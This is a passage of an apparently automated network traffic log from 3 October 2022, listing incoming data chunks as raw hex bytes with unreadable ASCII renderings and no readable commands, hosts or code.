14 21 f2 ec d7 14 71 12 90 91 ed 46 dd 9e 57 fe f7 d3 cc 3b 98 11 84 Data Ascii: <fWiy5/&;oK*'\|q8mbN]#p%'XRNB~2y+`nex:T{{v}{PWaG2Lp.$,DA"77m@F)0xYh4K1h_xB#=Fd!qFW;
2022-10-03 14:13:31 UTC	52	IN	Data Raw: 69 8d 6f 1a f0 4c 7e 1e 61 12 4d 84 4c 2c c9 79 79 b5 a4 21 11 b7 d6 95 3c d5 81 04 00 a5 f4 a8 e0 58 ce 61 13 ec dd 2c c0 08 be c1 aa 57 0c da 28 d4 a7 e2 bc 56 61 9d 38 a6 55 1d 6f 28 04 0f 3e 14 cd e0 a8 1c 26 56 40 2f d7 12 90 d4 64 9e f5 ee 03 4e ed 0c e6 e2 10 45 8a 68 e9 c4 b6 ee 85 ac d5 f3 d3 ff ea d3 cf d9 74 d4 4b 93 bf 64 ae c4 22 8c 62 97 97 c5 78 40 5e d0 f5 3a 27 54 1f 35 60 71 4e 38 b3 3c 1a 19 19 00 8b 34 f9 96 ee b4 2a 58 bd 89 df 21 1b a3 bd c3 10 e7 fe 39 24 8b 4d d0 40 3e e0 63 7c 95 95 04 68 4d e4 90 76 39 9b e6 dd 5c 17 bc 7a b4 bd 49 51 a4 c9 4e 71 20 34 d9 d5 20 de 4c 69 3d d6 f1 85 52 f1 46 c6 88 a5 7d 9d 78 5b a2 11 f2 50 2c 72 6a 90 cd bc cf 38 ad 35 53 42 22 86 64 2c 34 13 77 42 aa 1e 91 35 d4 7b 6c 81 cd 28 c5 3d 3b 1e f6 53 Data Ascii: ioL~aML,yy!<Xa,W(Va8Uo(>&V@/dNEhtKd"bx@^:'T5`qN8<4*X!9$M@>c\|hMv9\zIQNq 4 Li=RF}x[P,rj85SB"d,4wB5{l(=;S
2022-10-03 14:13:31 UTC	53	IN	Data Raw: 45 57 9d 82 a2 79 d8 d6 84 99 14 db 73 89 8d 27 fe 5a 21 07 15 d9 07 9d 7c d7 6f c0 50 5b 05 cc 15 36 68 da 42 0f 7a 66 ab 48 e9 89 4b 7e a3 76 1f 9e 2d a7 78 1d 20 08 5f 10 01 63 bf 23 e6 6e bb d2 56 f1 c7 f1 c6 a5 39 ce f9 16 67 74 0c 1b 9b 8e 48 aa 33 34 38 be 65 fe 90 62 b9 fd 4e b9 c5 4a 63 80 e1 9d 56 36 5c e1 36 12 5a a0 ab 74 1d 18 fd fe f0 8f ab 12 b6 df 8b 84 69 e9 6c dd 1d c9 7c 32 6d 2b 9e fc 16 e9 c0 d9 78 c6 1e 58 72 93 4b 19 99 30 eb 7b d3 cd 91 5e 60 e5 57 ed d4 a9 1f 8b a5 15 74 8f 1e 5a e0 0f 4a c7 6a 5c df 1c f9 02 a1 63 f1 33 9c 80 25 4a a2 81 7d d0 05 00 26 e2 b6 b2 52 c8 dc e8 a1 2b 8a ff fc 36 22 87 f2 ae 40 80 26 82 95 09 1f 7f 6c 87 cd 62 95 c8 f6 3b c9 93 6c 80 5a a9 21 18 6b 32 9f f6 d7 b6 14 99 70 f2 dd a8 2d d6 59 44 de 3d b7 Data Ascii: EWys'Z!\|oP[6hBzfHK~v-x _c#nV9gtH348ebNJcV6\6Ztil\|2m+xXrK0{^`WtZJj\c3%J}&R+6"@&lb;lZ!k2p-YD=
2022-10-03 14:13:31 UTC	55	IN	Data Raw: bc 1e 67 28 ae 14 21 2e 5d dd c3 13 15 75 a4 bc 1f 80 e1 a3 6b 3b 49 42 cd a7 5d 9c 85 12 8d ca 7f 18 0e 69 38 f8 99 c2 dc a7 51 a2 d6 19 b0 24 22 f2 8d 0e 49 68 ab 42 cd fd 8b 7c 1e 8f 12 4d 88 42 2c 24 79 79 b9 17 06 1a be f0 84 ef d5 1a 05 00 a5 47 bd e6 37 03 b6 1e f9 d0 3f cb 08 ae d6 b4 a9 0f f6 60 d3 d2 a0 bd 58 67 8b 0b 3d 48 14 72 23 65 71 35 01 89 1e a9 30 31 6f 5b 26 fa 43 92 d4 ed 81 b0 ec 0a 30 87 07 f9 f2 90 38 a6 61 d5 e5 c5 ee 85 b7 af f1 d9 ff fd d4 d2 e5 89 c7 64 da a4 72 78 c5 5e 97 71 97 95 c7 19 5a 77 1c f3 55 d8 53 0c 33 75 a3 4e d2 b3 3c 16 61 de 16 5d bf 1e 9b f1 80 2a 5a ab 8b de 37 56 59 b2 eb 96 59 fb ef 38 9d 18 ca c5 89 e5 7e 71 a6 7d 2d 8e 5d f5 9e 66 3b 9d 3b 5a cd 0a ae 7c a3 a4 5f 55 87 3f 5d 7a 39 29 2c 58 84 d7 74 66 11 Data Ascii: g(!.]uk;IB]i8Q$"IhB\|MB,$yyG7?`Xg=Hr#eq501o[&C08adrx^qZwUS3uN<a]*Z7VYY8~q}-]f;;Z\|_U?]z9),Xtf
2022-10-03 14:13:31 UTC	56	IN	Data Raw: be b6 44 29 b1 2b 3a ff 85 1e 8f 28 f6 12 36 09 aa 1d 61 ea 44 11 4f 14 17 d0 ad b9 52 52 9d 40 b2 49 37 b1 2c 38 62 76 32 47 4a 6c 01 06 f1 98 21 4e 08 11 be 5c 4c 8e 8e bd 78 c1 c2 8a 76 1e e8 7e 74 9f 02 f0 52 31 83 a2 c1 15 54 ac 46 70 ed 5a 4c 1c d0 d0 2e 6e d4 42 03 52 98 bb 6e fb 4f 60 a8 54 b1 ed 43 c1 53 64 1f 21 17 75 e4 1f 5d 52 21 c3 72 7c 46 7b b2 2e d8 b4 8b 2a dd f2 1a 69 42 09 ee 9a b3 40 a2 35 c0 39 83 66 e9 06 2b ab d5 53 84 d3 79 2f 6f 15 7d 77 e2 43 cf 21 33 59 ba b1 d2 e3 e7 8c e1 d9 8d a2 18 a5 c2 fb 53 96 e8 4a cf 41 74 c3 39 62 92 49 ee 12 fc e8 cc 5b 6c 0f 53 67 98 46 19 b5 31 e5 01 1d 1a 00 47 77 fe 62 fa cb 81 f9 82 ba 2f 9d 03 35 4f e9 16 8f c2 72 4d 1f 8e 8d 10 29 c0 db 02 96 7e da 5f 8e 96 62 f8 ec 09 30 1a a0 13 56 df cf e2 Data Ascii: D)+:(6aDORR@I7,8bv2GJl!N\Lxv~tR1TFpZL.nBRnO`TCSd!u]R!r\|F{.*iB@59f+Sy/o}wC!3YSJAt9bI[lSgF1Gwb/5OrM)~_b0V
2022-10-03 14:13:31 UTC	57	IN	Data Raw: 10 b7 9f 09 33 64 6d 07 26 10 28 b7 59 9a f2 48 73 22 c1 28 6c 0c 6c 0a 2e 70 24 57 af 4d f5 ba 7a c7 56 21 51 67 01 a2 4b 70 e2 d5 c1 c6 8a 78 d6 75 cb ae c2 ab e0 77 0f bb 1a d9 13 30 29 4f cf 09 66 a7 af 0b 9a f6 4e 61 17 5d 5f df 8f b0 98 a9 12 8b d8 99 cf 2a 75 2f ea 8f bc dc a7 5b a1 f6 0f bb 35 36 e4 6c 29 9b 7e 85 1f d2 eb 5d 7f 73 eb 04 4c 8e 41 4b 2d 7b 51 5c 79 ff 11 a0 e9 96 35 ab e5 1c fe ae 04 ae e4 20 df 77 c5 6b c6 2c c0 09 b3 c4 b9 52 0e cb 68 c3 43 bc 90 5b 79 8e 3d a6 46 18 7e 21 9b 61 12 18 c5 ca b7 16 2e 63 4a 3e c1 0d 6e d5 c1 8c f7 fd 7a 27 97 0c e2 e5 b8 44 9d 69 ed be de e7 96 ad ba f3 d7 e9 12 de e1 d2 60 d5 4d fc bc 60 b1 c9 cf 89 5c 95 b8 c5 4e ca 88 e3 0a 33 22 6d cf c7 9d 86 29 02 b2 3c 0f 3e c1 17 6e b9 c8 96 e7 b5 39 40 bd Data Ascii: 3dm&(YHs"(ll.p$WMzV!QgKpxuw0)OfNa]_*u/[56l)~]sLAK-{Q\y5 wk,RhC[y=F~!a.cJ>nz'Di`M`\N3"m)<>n9@
2022-10-03 14:13:31 UTC	58	IN	Data Raw: 5a 5e af 24 4d d0 11 c0 5d 1c 15 21 82 8f d0 68 f7 a6 1a 5e 41 c4 6e 6f 99 3f e2 3e 8e eb 11 2d 3d c1 cf 76 9d ba f0 4e 69 67 7f 21 a3 6a 7f 0b 12 84 52 53 53 64 88 cd 24 a8 38 28 ec 87 18 90 33 03 0c 36 e6 bd 33 0b f9 2a 0e 4a 03 cb d2 a0 c5 af 4c 96 59 a0 64 35 b7 31 d7 68 45 33 a1 49 3b 0a 16 f4 9f 3b 50 cd 84 cf 51 40 8e 99 af 77 db 37 8b 4b 24 f5 0f 93 9f 2e e5 5d 46 01 15 c8 16 94 7e 3d 46 bd 58 4a 05 cd 4e 22 6e c5 48 08 64 72 92 de f2 77 40 7a 0b 4e f2 6a bd 5c 66 0e 20 04 51 10 0d 7c 41 33 c7 7a bf 29 6d 44 34 1f 31 a2 ba e4 00 e8 89 81 05 f3 89 af 4b ac 2d 22 c6 ae 43 eb 80 e8 b4 d1 4c 89 ca 6f 3c 73 1e 73 52 03 4e 1d 2c 0e 64 a6 e0 70 1b 09 76 6f 7c af a9 18 b5 c1 f3 ff 6f e9 66 c3 51 fd 65 37 6c 55 96 71 94 e3 ca de f2 7d 19 4c 50 fe b9 18 93 Data Ascii: Z^$M]!h^Ano?>-=vNig!jRSSd$8(363*JLYd51hE3I;;PQ@w7K$.]F~=FXJN"nHdrw@zNj\f Q\|A3z)mD41K-"CLo<ssRN,dpvo\|ofQe7lUq}LP
2022-10-03 14:13:31 UTC	60	IN	Data Raw: 54 8e e7 5f 1f 47 17 ec 7c 5c 96 6e 95 99 37 8e 80 14 d4 86 96 df dd c9 f2 9a d8 c3 27 48 08 7c b7 24 0c 9f 9e 72 c4 c6 68 90 29 d8 ec 0e 11 1a 9c 1a e2 b4 2e 10 a5 e9 35 29 64 6e 12 da 6a 10 b4 41 95 8f 57 64 dc c4 0c 44 04 6c 19 2c 68 cb 53 99 b1 df 94 40 26 2f 42 70 66 05 a4 1a 45 e1 d6 b8 3c 81 63 c1 5a cb bf c7 a4 2e 74 23 99 19 df 2f ed d6 b0 21 02 7e 89 b4 1a 98 f8 4e 61 17 5a 51 d9 95 a4 8b 57 02 a2 c1 70 c5 06 78 31 02 b0 17 de 8c 59 96 06 08 c0 05 32 f9 96 02 95 6b 84 19 e5 eb 5d 7f 5b 90 13 4d 9d 75 41 3b 50 79 bf 78 9f 1b be eb 85 3e 91 fb 04 07 b8 d6 a1 cb 35 1d 6b 13 e1 e1 d2 c1 24 bd ca a1 57 09 c2 93 d5 91 bf 97 5a 4a 7e 3a dd 75 1c 61 2c 4f 42 3c 1d b0 c2 a9 1c 39 4c 54 2d ec 00 a0 d6 ed b6 f5 ff 01 38 96 0c f7 f0 65 12 91 68 ea ad 3f ef Data Ascii: T_G\|\n7'H\|$rh).5)dnjAWdDl,hS@&/BpfE<cZ.t#/!~NaZQWpx1Y2k][MuA;Pyx>5k$WZJ~:ua,OB<9LT-8eh?
2022-10-03 14:13:31 UTC	61	IN	Data Raw: 5e f6 a9 d8 e6 5c 3a dd f9 fa 6d 29 7c 7a be 30 54 fc ac 38 02 49 4a a2 f0 63 a6 6e 43 cf 2e 87 fa 34 20 16 94 8d 3e 91 76 ba 86 31 6e 73 0f 03 8a ac 9c 37 4b 6d 62 bf 29 4b bf 5f de 44 e6 3c 3e 91 8d ad 55 d5 a6 1e 41 6e 62 6e 6f 93 26 d0 19 80 eb 06 5e 66 3e ce 5e a2 8d 88 54 6e 4f 58 af 14 7a c6 f4 c9 93 8e d8 4a 52 8b cc 2f cf 68 24 ec 92 3d b8 3a fd 0b 32 d4 ab 31 7a 82 c3 0f 4e 1e 17 e9 92 d5 aa 55 e3 09 ac 64 20 92 15 2a 69 6f 15 9a 4b 40 1b 78 1c 9a 28 53 d8 a8 eb 41 4d 88 f6 e1 69 d2 cd a2 5c 16 f7 72 a2 bd 2e e1 5f 5d e5 14 c8 07 84 5e 15 6d ec 5c 34 40 da c3 21 46 f8 4a 1c 76 4e 99 42 f2 7d 25 ba aa 4e f8 66 bd 4b 66 0e 20 67 5a 18 1e 7b 52 25 e1 06 b8 d0 44 7d 3b 0e 33 b6 2c d5 9c c4 77 7e 10 e8 93 8a 76 bd 20 34 15 ad 44 a8 81 b4 f7 d0 4c 94 Data Ascii: ^\:m)\|z0T8IJcnC.4 >v1ns7Kmb)K_D<>UAnbno&^f>^TnOXzJR/h$=:21zNUd *ioK@x(SAMi\r._]^m\4@!FJvNB}%NfKf gZ{R%D};3,w~v 4DL
2022-10-03 14:13:31 UTC	62	IN	Data Raw: b5 93 8f fd b5 c7 3f 60 e9 55 7b 2f 1e cf 61 10 d5 f8 a7 dd 87 d6 47 09 3d 44 27 4b 21 9e e6 dd 3c ae 11 90 86 88 52 f4 fb 5d f4 c4 74 ce 17 97 3b b4 f9 ca b9 7e c4 ec 5f 12 3e 05 ed 50 54 ee 88 95 9e 25 63 85 13 f9 bc 90 9b 97 cb 89 8f ad bf 23 62 2b 72 b2 5b 1b f1 71 76 ee cc 7f ff 23 ea ee 04 56 eb 9c 1a 74 9c 1c 03 b3 e4 36 14 64 69 0f 4b 34 3c b6 53 8f 8b 3f df 22 c5 2a 6b db b9 34 3a 74 40 68 b5 b3 f5 ba 67 d4 29 4c 6a 67 05 a1 5f 06 e3 d5 cf c0 5e 76 e0 58 fd bf c7 bd 13 60 ae a9 19 df 2e 7a fe 87 30 14 7f 7c a8 1c f0 8d b0 60 31 72 4e f8 95 a3 9c b5 03 8e c1 67 c8 06 1d 41 fc a7 3b dc a7 5b bd e5 0c bb 5e b3 f9 87 0d b7 69 86 77 f4 e9 5d 2f 70 90 13 ee 8e 45 52 2d 6b 7c 87 38 fe 1b be fa 82 30 a5 eb fa 01 83 3d a6 ef 1f 37 62 13 e0 df 1f c0 08 b5 Data Ascii: ?`U{/aG=D'K!<R]t;~_>PT%c#b+r[qv#Vt6diK4<S?"*k4:t@hg)Ljg_^vX`.z0\|`1rNgA;[^iw]/pER-k\|80=7b
2022-10-03 14:13:31 UTC	64	IN	Data Raw: a6 80 ed eb b2 a7 89 3b 6e 96 6f d0 a9 ec 1d 72 6b 82 db b1 dd 27 ac 2d 5f 42 22 8f be 15 c4 02 7e c6 0c 0a 80 32 f9 d5 d9 93 cd 35 33 e4 1e 36 c6 40 c2 00 3e 5e ca 8c f3 d1 5a 44 94 26 f8 7d 2b 54 53 be 36 7c de 84 38 08 26 a2 f9 f0 73 d4 46 7d e9 2e 81 85 75 21 22 90 fc 82 92 60 bc ae 12 6e 73 05 bc 62 a1 40 3d 5c 60 50 bc 28 56 f1 1b df aa e2 14 0d 34 8d ab 6c e9 aa 93 7a 01 8a 6e 7c 91 31 f0 3b 95 77 11 28 32 29 52 4b 82 a0 9d c8 79 6f 62 b9 88 61 a1 06 de 0f 95 d6 79 72 14 dd 21 ad 3d b9 fd 9e 08 99 a5 ec 05 04 e1 37 20 78 f2 22 18 d2 05 19 de a0 c0 36 42 95 55 a6 72 b8 ab 24 22 6b 70 3a af 54 4c 39 ee f4 9b 22 5b 50 37 ce 52 97 99 5e 2f 59 d2 c9 8b 6b 17 e8 7b 82 88 2c 6f e2 2d 02 cf e0 f4 82 76 23 1d e2 5b 4a 05 c8 c5 3a 7e 48 78 1c 70 67 a9 47 fa Data Ascii: ;nork'-_B"~2536@>^ZD&}+TS6\|8&sF}.u!"`nsb@=\`P(V4lzn\|1;w(2)RKyobayr!=7 x"6BUr$"kp:TL9"[P7R^/Yk{,o-v#[J:~HxpgG
2022-10-03 14:13:31 UTC	65	IN	Data Raw: 96 c9 23 ae 4e f4 86 6b 21 37 82 89 35 1c 8b 6d 81 ef 50 91 dc d4 d5 b8 b1 68 97 dd c1 02 1a 6a 2b 9f cf db a3 10 3d 69 dc a5 bf 05 27 70 67 d4 2c b9 93 ac 2e b7 93 86 93 96 c5 31 6a ef 7d 33 2c 1e c8 72 08 ea fb 39 db af f5 e5 09 37 42 27 32 23 9e e6 b8 37 f4 12 9a 86 d3 64 f5 fb 51 fe c4 02 ce 17 97 3b a4 f9 ca b9 41 e5 ce 5d 18 5b 86 ce 52 5e 8b 63 bd ba 2c 70 87 30 fe 88 97 f4 38 e3 aa 85 d9 c9 34 11 08 7c b4 53 7c bd 9c 76 e4 c0 40 fe 39 e8 e8 06 11 01 9f 1a 78 9c 0d 01 b3 e8 09 41 46 6b 05 2e 04 1f b4 59 94 89 78 1d 21 c5 26 4e 3b 46 1a 2b 76 1d 71 b5 b3 fe 81 18 e7 2f 39 5a 08 26 a2 30 6d e5 fd ed 1f 80 65 cd 58 e2 bc c7 b1 36 55 23 b1 13 c8 5c 53 d4 b0 3a 7b 56 a0 af 10 99 c7 80 63 3b 5e 41 fa a4 a0 9d af 2b ad c3 67 c4 11 0c 0b fe b1 31 b3 84 59 Data Ascii: #Nk!75mPhj+=i'pg,.1j}3,r97B'2#7dQ;A][R^c,p084\|S\|v@9xAFk.Yx!&N;F+vq/9Z&0meX6U#\S:{Vc;^A+g1Y
2022-10-03 14:13:31 UTC	65	IN	Data Raw: d7 5f 7c 52 ab 44 e1 70 fa 6f 64 0e 20 d6 4e 0b 1a 59 36 23 ca 63 c5 f0 6e 68 33 d0 36 9f 02 eb f3 16 7c 6d 0b cd ad a2 4b b7 fe 3e 29 ab 47 73 89 9c be be 6b 90 c0 78 f1 72 36 54 5f 1c 48 cb 1a 22 53 aa 2f 75 0c 1c 5b 81 f1 9e af 77 93 cb e4 78 b6 e6 43 ea 74 fa 74 3a 69 56 bb ca 16 e3 c0 01 50 7d 1a 70 14 ba b8 1e f6 1d e4 08 00 12 9e 71 5b d7 46 e9 ca 92 fb a1 92 13 63 08 c7 5a f1 0a 71 98 7a 5a cf 70 7c 11 a7 7d 3b 14 4e a9 13 40 b3 8f 7a ec d5 35 26 e4 ab e1 55 d9 d8 c1 df 2c 9b ff 85 06 ac 44 f8 70 4e 07 1f b2 81 1d 3d 9b 78 af f0 73 91 d6 00 c2 da 97 42 10 d6 ae 27 77 4d 23 99 ed 0f af 35 13 57 f4 c9 b6 16 37 70 73 d4 2c b9 5a df 1d b1 bb 0f fd b5 c1 5e 47 eb 55 54 f1 11 eb 52 16 d1 f8 33 ce 90 fe d2 09 3d 5f 8a 10 30 9a c4 57 15 f6 14 ff a7 f9 4a Data Ascii: _\|RDpod NY6#cnh36\|mK>)Gskxr6T_H"S/u[wxCtt:iVP}pq[FcZqzZp\|};N@z5&U,DpN=xsB'wM#5W7ps,Z^GUTR3=_0WJ
2022-10-03 14:13:31 UTC	67	IN	Data Raw: 5b bd ea 0a bb 24 16 f9 92 29 b7 69 87 64 a6 ee 5d 7b 7f 90 13 4d fe 41 43 3b 77 79 bf 78 da 1b be fb 93 35 ba e0 7b 04 af 28 ae e7 37 05 ed 17 e6 f7 23 c0 08 bf f8 aa 57 0f da 6d d4 bd 21 b8 58 61 93 38 a6 57 b7 65 28 65 6f 3e 1e cd c5 a8 1c 3c 66 4a 2f c4 aa 94 d4 ed 90 f5 ff 01 f7 92 0c e6 e9 6e 39 8a 4d ed ba c0 ee 85 a8 ba 34 d6 ff ec d1 cd d1 77 22 4c fc ad 69 ae c2 31 ad 70 97 92 c0 76 45 76 ec f1 3a 21 5c 0c 39 62 87 25 28 b2 33 1c 0e c3 32 5d b9 c9 96 ee b5 39 5c ae 9a d5 26 15 a7 b3 dc 9b 50 ec 36 35 82 5c fc ce 89 f5 75 6e 9f 83 06 a7 4d e4 98 65 32 8a d5 ce a2 14 a0 7c a5 bb 40 46 8c 3e 4c 71 26 25 95 5c a8 de 42 68 15 06 a5 80 58 82 bd c7 88 af 22 8c 72 4d 78 06 24 dd 79 77 6a 91 d0 b9 c6 36 db 3e 57 cc 9a 94 64 3d 18 02 7e cd 1d 0f 94 24 50 Data Ascii: [$)id]{MAC;wyx5{(7#Wm!Xa8We(eo><fJ/n9M4w"Li1pvEv:!\9b%(32]9\&P65\unMe2\|@F>Lq&%\BhX"rMx$ywj6>Wd=~$P
2022-10-03 14:13:31 UTC	68	IN	Data Raw: 4f 58 9d 95 f4 9b 29 4f f6 aa d3 42 47 a2 86 72 4d d2 c9 88 4f 01 f7 74 80 8d 29 ca 59 e2 2b 15 c8 0f aa 62 29 6e e6 49 4d 15 c8 cb 5b 7b c4 49 16 63 6f ac 50 fa 65 43 7a 14 4e f2 66 5e da 64 0e 2b 1b 48 0b 18 59 e1 22 ca 6f bc f9 6b 6e 32 d3 a9 be 2a dd e2 1f 7a 0d 31 e7 9a a8 58 b7 31 34 2a 86 47 95 8b 9c be f9 60 90 c0 78 3e 57 36 17 5c 1c 44 8c 00 20 53 aa e0 7f 0f 31 5b 88 f3 9e af 30 98 cb e4 78 79 c0 4e b5 41 fa 72 5f 57 46 93 f7 07 e9 d8 f6 78 14 1d 58 7e 93 94 1a 99 30 f7 21 22 b5 92 54 75 8e 6b eb c0 8b f9 83 b7 3a 4b 78 1a 5a e6 26 75 c3 7b 50 d8 36 73 68 a4 77 e3 74 46 83 25 4a a2 8f 7b d1 d5 7e 25 e4 a7 17 79 ca dc e3 a3 04 b3 84 e9 21 a8 2b df ac 41 28 26 8e 93 34 1f f6 6e 87 c1 5b bd de de c8 da ba 42 e8 d4 ae 27 77 47 23 99 ed c0 aa 02 12 Data Ascii: OX)OBGrMOt)Y+b)nIM[{IcoPeCzNf^d+HY"okn2z1X14G`x>W6\D S1[0xyNAr_WFxX~0!"Tuk:KxZ&u{P6shwtF%J{~%y!+A(&4n[B'wG#
2022-10-03 14:13:31 UTC	69	IN	Data Raw: e3 d5 e0 1c 80 62 de 40 c8 bf a5 b7 1e 76 8e b1 19 ce 30 57 fe 68 30 14 7f 8a 24 19 9f e9 98 53 3b 58 43 de 8a b9 b5 71 03 8e c9 4f 42 05 7f 2f d4 82 3b dc ad 56 a9 ee 02 b2 36 32 d1 5a 29 b7 6f aa 60 d0 e0 83 50 76 97 7c 46 8f 45 49 23 a2 16 87 7a ff 11 96 3c 92 35 bc ea da 15 8a 00 96 e7 37 0f 73 17 95 ed 2e c0 02 b5 f5 9d 57 0e d0 b3 d4 bb 97 bc 58 60 8d 38 a6 57 1d 61 28 2e 2b 3e 0b e8 e0 a8 1d 26 56 49 2f 98 13 90 d4 46 9e f5 ee 72 2a 94 0c ec ec 68 47 eb 69 ed be e9 03 84 a8 bc ca 94 fc ec d9 e5 3f 76 c6 4e 93 8a 67 ae c8 ef 86 55 bf a5 c0 76 4f 7a 34 c2 3a 21 58 d2 39 64 07 40 29 b2 38 34 e3 c2 17 5b 91 8e 95 ee b3 11 be aa 9a d3 47 32 a5 b3 cd 40 5e c9 11 03 82 5c d3 c3 a1 c3 75 6e 95 5d 2c a4 67 e5 8a 65 32 8a ed cd a2 08 8d 7c ab 9e 65 46 8d 3f Data Ascii: b@v0Wh0$S;XCqOB/;V62Z)o`Pv\|FEI#z<57s.WX`8Wa(.+>&VI/Fr*hGi?vNgUvOz4:!X9d@)84[G2@^\un],ge2\|eF?
2022-10-03 14:13:31 UTC	71	IN	Data Raw: 7b af 1e 4a fb e3 37 6c 5a c8 73 69 fd f6 29 b1 2a 09 e0 87 18 fa 03 fd 0d 1b 98 ca 31 70 e7 f7 1c 42 3c ab c0 aa dc 90 a0 63 b5 52 ba 2a a8 20 d7 7f 78 3d b9 50 2f 70 17 f4 91 f4 5f f4 c1 9d 42 4d 8e 88 a2 68 2e c9 8a 67 46 f7 74 8a d1 2f e1 55 3d 0d 15 c8 28 82 76 28 6c ec 5a 4a aa db c3 25 ad c5 49 1c 1c 67 ba 42 e4 77 4a 52 ab 4e f2 60 d0 58 64 0e 5e 08 4e 1a 02 70 41 22 5a 64 aa d7 62 68 39 0e 39 ba 2a dd e8 26 72 7e 3f e7 9a a2 fa bd 20 2f 27 b3 47 39 88 9c b2 f9 7f 91 c0 74 07 5d 1e 62 55 11 31 b8 2d 22 59 ab f6 7c 35 8e 70 fe f6 b6 9a 18 b4 c3 8b 2d 68 e9 6c cb 6a c7 74 30 70 68 d1 f4 3e 8f cb df 5a 7f 0e 4e 6b b4 93 35 88 2a f7 07 90 df 95 45 77 c9 1d ea c0 87 87 4c a5 13 69 2e 0b 5d f1 0a 71 56 78 5a cf 37 68 13 a7 7d 8a 44 6b 81 2f 51 bc 92 bf Data Ascii: {J7lZsi)1pB<cR x=P/p_BMh.gFt/U=(v(lZJ%IgBwJRN`Xd^NpA"Zdbh99&r~? /'G9t]bU1-"Y\|5p-hljt0ph>ZNk5EwLi.]qVxZ7h}Dk/Q
2022-10-03 14:13:31 UTC	72	IN	Data Raw: b7 b2 ee 0e 38 09 8b 0b 69 a2 38 9c a2 f5 71 86 65 69 0f 4b 54 3d b6 5f 8f 83 57 65 af 9f 20 46 12 74 0e 3a 67 23 44 28 a2 e3 f9 df c4 2d 33 3f 26 04 a0 36 76 ef fd 61 1f 80 65 aa 35 ca bf c1 b1 0f 7a 4c 7f 18 df 25 af da a1 3b 38 72 b3 a4 75 fe ef b0 6a e7 49 5a c5 43 b0 8e b8 10 9f d7 e9 79 39 c3 d7 03 4e e5 d0 b6 52 91 e2 1b b2 4b 52 f9 92 22 6b 78 96 73 12 f9 4c 6a 60 81 01 c3 39 7a 33 c5 87 86 61 6d da 33 88 fa 93 3f a9 ef 77 1a ad 28 aa ea 1f 32 60 13 ec 29 2e c6 22 b6 f7 aa 16 42 da 6d d6 bd bd bc e3 61 9d 38 b3 56 1d 61 f8 64 60 3e 12 cd e0 a8 1c 3d 66 4a 2d c4 13 90 4c ed 9e f5 a8 00 30 96 e3 e7 e6 6e 35 8a 68 ed ba c1 ee 85 a8 ba e2 d2 ac ec df cd 6a 76 c6 48 f2 af 65 ae d7 31 88 70 b2 93 c0 77 5e 46 1a f5 2a 20 52 0c 8a 62 79 30 5b 8f 3d 1c 08 Data Ascii: 8i8qeiKT=_We Ft:g#D(-3?&6vae5zL%;8rujIZCy9NRKR"kxsLj`9z3am3?w(2`)."Bma8Vad`>=fJ-L0n5hjvHe1pw^F* Rby0[=
2022-10-03 14:13:31 UTC	73	IN	Data Raw: ae 12 6e 73 03 6c 7e 8f 9c 33 68 45 50 bd 29 4d f1 1c c3 08 e2 1a 28 92 8d aa 66 c6 a5 1e 17 01 8a 6f c4 99 20 e9 5e 99 e9 00 2a 2f 39 b0 32 8b b8 8f 7c 85 66 7b a9 3c 20 aa 1c ce bb 6a df 62 62 e7 eb 2b b1 21 fb e2 b3 3d b9 39 fd 07 16 df 9c 31 70 e7 f5 0e 48 6a 79 c0 aa d2 82 be 9c 4a ab 4c 74 b9 2c 2f 41 86 3c b9 4d 2f 36 15 f4 91 f6 57 fb a8 e7 42 4d 84 85 8a 5f d2 c9 80 b9 15 f1 5e 8b 82 2e e1 55 32 0b 15 d4 2f 82 78 0c 6e ec 5b 4a 03 eb c3 39 22 c5 47 39 70 66 bb 59 c2 74 4a 0e ab 4e f2 cb d2 58 75 7d 30 0a 4e 10 14 77 3f 4b cb 65 ae ff 81 69 39 08 11 e8 29 dd f5 3e 98 7f 1a e3 f5 85 49 bd 2a e0 36 8a 47 d7 88 9c b2 dd 64 a5 c0 72 25 a0 1e 64 21 75 43 e3 29 0a be a1 f1 73 35 4a 70 fe f6 b6 46 19 b4 cf 8b 55 6a e9 6c 1c 4c df 5c 06 7a 44 99 f0 3e d4 Data Ascii: nsl~3hEP)M(fo ^/92\|f{< jbb+!=91pHjyJLt,/A<M/6WBM_^.U2/xn[J9"G9pfYtJNXu}0Nw?Kei9)>I6Gdr%d!uC)s5JpFUjlL\zD>
2022-10-03 14:13:31 UTC	74	IN	Data Raw: 0f ed 2d cb 64 d3 11 87 f3 c0 a2 50 f9 af 5d 18 5b 86 a9 52 5e 8b 76 80 a6 a3 70 81 38 c4 b8 bc b1 3c cb 83 96 d4 d2 25 73 27 11 f2 5b 13 94 b6 cc ed c6 6e ff e8 e9 ee 04 2a 14 8d 1c 6f b9 41 47 b1 e2 14 1a df 6a 05 22 04 ee b7 59 94 9c 5c 01 1f c4 20 40 00 6c 08 20 61 3b 3d f6 b2 f4 90 7a ce 3c 35 3f 58 04 a0 36 76 ee ba cc 1d 80 69 ed cc c8 bf c1 d8 05 74 23 bb 35 f2 29 59 a0 b2 30 12 64 af c0 13 9e ef ba 48 19 5a 49 d4 bd 5f 9c a9 05 e1 8e 67 ce 0c 57 5e fe b1 3d f4 81 5b bd ef 1b b0 4b 74 fb 92 22 a5 7c af 2c c6 ea 57 41 19 6f ec b2 50 4b 51 2e 86 6f 9f 78 ff 00 d1 9b 93 35 b0 3c 03 28 12 2b a0 e1 1f 36 60 13 ec df 65 c2 08 b5 ce a2 41 1f d2 e3 63 aa 67 af 4e 72 92 00 11 57 1d 61 2e 0a 2a 3c 1e c7 8f e3 1e 3d 6c 59 38 fc 90 90 d4 ed 8c e2 d7 4d 32 96 Data Ascii: -dP][R^vp8<%s'[noAGj"Y\ @l a;=z<5?X6vit#5)Y0dHZI_gW^=[Kt"\|,WAoPKQ.ox5<(+6`eAcgNrWa.<=lY8M2
